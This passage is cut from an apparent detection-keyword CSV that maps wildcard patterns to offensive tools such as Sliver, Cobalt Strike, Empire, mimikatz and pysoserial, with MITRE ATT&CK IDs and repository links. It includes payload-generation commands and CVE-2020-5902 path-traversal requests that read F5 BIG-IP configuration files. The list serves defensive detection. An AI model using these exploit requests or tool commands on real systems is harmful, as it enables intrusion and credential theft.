--mtls * --os windows *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate --mtls * --save *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate payload=*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*generate --tcp-pivot *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate/canaries.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate/implants.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate_beacon*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z -*generate_beanshell1*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_exploit_path_from_template*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*generate_golden_saml*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*generate_hta operation1*,offensive_tool_keyword,octopus,Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_jdk8u20*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_loader_cmd*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*generate_mozillarhino1*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_mozillarhino2*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - 
TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_powershell operation1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_powershell_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_powershell_shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 
- T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_python_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - 
TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_python_shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_raw_payload*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*generate_spoofed_args_exe*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_stageless*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - 
T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_unmanaged_exe operation1 *.exe,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_x64_shellcode*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_x86_shellcode*,offensive_tool_keyword,octopus,Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*GenerateDllBase64Hta*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*GenerateExeBase64*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*GenerateForcedBrowseWordlist.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*generateInjectBinFile*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Generate-Macro.ps1*,offensive_tool_keyword,Generate-Macro,Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.,T1566 - T1059 - T1086 - T1056 - T1567,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/enigma0x3/Generate-Macro,1,1,N/A,N/A,7,665,218,2016-10-27T20:48:59Z,2015-01-09T01:34:22Z -*GenerateParameterWordlist.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*GenerateReverseTcpDrone*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*generate-rotating-beacon.*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z -*GeneratesShellcodeFromPEorDll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*GenericC2Relay.cs*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*Genetic-Malware/Ebowla*,offensive_tool_keyword,Ebowla,Framework for Making 
Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*genHTA*,offensive_tool_keyword,genHTA,Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator,T1564 - T1059 - T1027 - T1055,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/genHTA,1,0,N/A,N/A,1,15,3,2017-03-16T21:49:59Z,2017-06-12T10:58:35Z -*genmkvpwd *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*gentilkiwi (Benjamin DELPY)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*gentilkiwi*,offensive_tool_keyword,mimikatz,author of mimikatz and multiple other windows exploitation tools,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*GeorgePatsias/ScareCrow*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,1,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -*georgesotiriadis/Chimera*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/yasserjanah/CVE-2020-5902,1,0,N/A,N/A,1,37,13,2023-05-22T23:32:39Z,2020-07-06T01:12:23Z -*GET */tmui/login.jsp/.. 
